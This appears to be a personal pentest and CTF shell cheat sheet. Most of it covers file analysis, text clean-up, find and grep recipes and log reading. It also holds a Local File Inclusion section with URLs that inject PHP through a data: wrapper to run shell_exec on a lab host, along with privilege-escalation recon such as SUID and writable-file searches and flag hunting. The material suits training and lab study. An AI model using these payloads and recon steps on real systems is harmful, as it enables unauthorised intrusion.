Files analysis


checksec --file myfile

file myfile


binwalk -e myfile


foremost myfile
tree output/


strings -n 10 myfile 

hexedit myfile


Local File Inclusion


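Using PHP Wrappers (include() only honours the data: wrapper when allow_url_include is On; keeping it Off and including only from a fixed allow-list of files blocks this)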

http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
http://10.11.0.22/menu.php?file=c:\windows\system32\drivers\etc\hosts

Write files


# File creation
echo "line1
line2
line3" >> myfile

# How many lines?
wc -l myfile
3 myfile

$ cat myfile 
line1
line2
line3
cat >text<<EOF
hey
yo
EOF

cat text
hey
yo

Show line


sed -n '2271p' test1

Read file

cat etc.txt
awk '{print}' etc.txt

read files in a dir

cat directory/*.txt|less

See a line that contains

awk '/michele/' test1
grep -rni 'michele' test1 -C3

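Find lines that are not valid text in the current locale (in a UTF-8 locale this reports lines with invalid UTF-8 bytes, not every non-ASCII character)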

grep -naxv '.*' file.txt

File clean up


Remove duplicate lines

awk '!seen[$0]++' file

lowercase everything

sed 's/.*/\L&/g' file.txt > fileNew.txt

remove duplicates

sort -u pass.txt >> clean_pass.txt

Remove blank lines (empty or whitespace-only)

grep --text -v '^[[:space:]]*$' clean_pass.txt > pass.txt

Remove lines of 1 to 7 characters (keeps words of 8 characters or more)

egrep -xv '.{1,7}' pass.txt

Retrieve the last column

echo "Open 192.168.152.119:21" | cut -d ":" -f2 | sed ':a;N;$!ba;s/\n/,/g'

Compare files


echo "A" > file1.txt
➜  echo "B" >> file1.txt
➜  echo "C" >> file1.txt
➜  echo "B" > file2.txt
➜  comm file1.txt file2.txt
A
		B
C
➜ comm -12 file1.txt file2.txt
B
diff -c file1.txt file2.txt
*** file1.txt	2021-09-26 18:04:36.000000000 +0100
--- file2.txt	2021-09-26 18:04:44.000000000 +0100
***************
*** 1,3 ****
- A
  B
- C
--- 1 ----
vimdiff  file1.txt file2.txt

The -1 excludes lines that are only in a.txt, and the -3 excludes lines that are in both. Thus only the lines exclusively in b.txt are output (see man comm or comm --help for details). The output is redirected to c.txt. Note that comm expects both input files to be sorted.

comm -1 -3 a.txt b.txt > c.txt

If you want the difference between the two files, use diff rather than comm. e.g.

diff -u a.txt b.txt > c.txt

Find files


Find flags

find / '(' -name 'user.txt' -or -name 'root.txt' ')' -exec wc -c {} \; -exec cat {} \; 2>/dev/null

Find SUID / SGID files

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -type f -perm -4000 2>/dev/null

Find files containing an IP address

find / -type f -exec grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" {} \+ 2>/dev/null

Find files owned by the user or writable by anybody

find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq

Find files writable by any group of the user

for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done

Find root owned files in /home folders

find /home -user root 2>/dev/null

Files owned by other users in folders owned by me

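# List entries not owned by the current user inside directories that the
# current user owns. The outer find must actually run: directory names are
# streamed NUL-delimited into the loop so names with spaces or newlines
# are handled, and every expansion is quoted.
me=$(whoami)
find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user "$me" -print0 2>/dev/null |
  while IFS= read -r -d '' d; do
    find "$d" ! -user "$me" -exec ls -l {} \; 2>/dev/null
  done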

Files owned by root, readable by me but not world-readable

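# Root-owned regular files that are not world-readable but that the invoking
# user can still read (e.g. through group membership or an ACL).
# -readable is a GNU find test; without it the command lists every
# non-world-readable root file, whether or not the current user can read it.
find / -type f -user root ! -perm -o=r -readable 2>/dev/null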

Files owned by me or world writable

find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null

Writable files by each group I belong to

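# For each group the current user belongs to, list files and directories that
# are writable by that group, skipping /proc, /sys and the user's home.
# The group name is passed to printf as an argument, not as the format string,
# and the loop is closed by a single "done".
for g in $(groups); do
  printf '  Group %s:\n' "$g"
  find / '(' -type f -or -type d ')' -group "$g" -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
done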

Run command on output

find ~/Downloads -type f -name 'file*' -print0 | xargs -0 ls -ail

Retrieve info in a file

head flag.txt; wc flag.txt
find . -type f -name flag.txt -print0 2>/dev/null | xargs -0 egrep '^r[a-zA-Z0-9]*0$'

Read logs

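# Requests per client (first space-separated field), busiest first.
# The final sort is -rn only: with -u added, clients that share the same
# request count compare equal and all but one of them are dropped.
cut -d " " -f 1 access.log | sort | uniq -c | sort -rn
# Requests from one client that touch /admin. -F matches the address
# literally (dots are not wildcards) and -w stops 192.168.10.1 from also
# matching 192.168.10.10 and similar.
grep -Fw '192.168.10.1' access.log | grep '/admin' | sort -u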

Copy files only (no dir)

find -maxdepth 1 -type f -exec echo cp {} newlocation/ \;

Find git folder

find . -name .git -type d

Locate all .git config in my current path

find . -name .git -type d -exec echo {}/config \;

Find excluding directories foo and bar

find /dir \( -name foo -prune \) -o \( -name bar -prune \) -o -name "*.sh" -print

Search Python files for urlopen

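# Print every line that mentions urlopen in the Python files under $BASEDIR,
# prefixed with the file name.
# find is run directly: as a bare $( ... ) statement the shell would take the
# matched text and try to execute it as a command. Wrap it in $( ) only on
# the right-hand side of an assignment.
find "$BASEDIR" -type f -name '*.py' -exec grep -H urlopen {} +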

Find by date?

find . -newermt "2016-04-16"
find /path/to/dir -newermt "Feb 07"
find /path/to/dir -newermt "yyyy-mm-dd"

Find modified files on given date

find /path/to/dir -newermt yyyy-mm-dd ! -newermt yyyy-mm-dd -ls

Print all x.pl

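# Regular files named *.pl (case-insensitive) modified after the given date.
# find evaluates its expression left to right, so -print goes last; placed
# before -type/-iname it prints every newer entry and the name filter has
# no effect on the output.
find /path/to/dir -type f -iname "*.pl" -newermt "yyyy-mm-dd" -print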

Cat all files

find . -type f 2>/dev/null -exec cat {} \;

Find a term in a file

find /dir \( -name node_modules -prune \) -o -name "*.sh" -exec grep --color -Hn "your text to find" {} 2>/dev/null \;

Find specific term in files

grep -rni "term" . -C3

Search php file containing term

find . -name "*.php" -type f -print0 | xargs -0 grep -H "EcrmType::class"

Windows/powershell search files

Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Random


updatedb
locate '\.nse$' | xargs grep categories 

Grep 'version\|smbb'

grep -B 5 open nmap.scan

# Retrieve samaccountname from Bloodhound data with Jq 
cat 1234_users.json | jq '.data[].Properties | .samaccountname + ":" + .description' -r

Actions


Delete empty folder

find . -type d -empty -delete

Find unwanted junk files

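# -name takes a shell glob, not a regex, so "|" is a literal character and a
# pattern like 'a|b' matches nothing useful. Alternatives are combined with -o
# inside an escaped group.
find . -type f \( -name 'Thumbs.db' -o -name '.DS_Store' -o -name '*.jpeg' \)
# Single-name form.
find . -name '.DS_Store' -type f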

Move all non music files

find . -not -name '*.mp3' -not -name '*.m4a' -not -name '*.MP3' -type f -exec mv -f '{}' /Users/DIRTYFILES/. \;

Find a text and replace content

find . -type f -name "*.txt" -print0 | xargs -0 sed -i "s/replacement//g"
#sed -i 's/Database://' Database.kdbx

Create multiple folders

mkdir -p folder/{sub1,sub2}/{sub1,sub2,sub3}

intercept stdout and log to file

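# Append the stream to "log" and discard the copy tee writes to stdout.
# The stray trailing backtick is removed (it left the command unterminated),
# and the extra cat processes are replaced by plain redirections.
tee -a log < file > /dev/null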

Sum up all the lines of a file

awk '{ sum += $1 } END { print sum }' sum-me.txt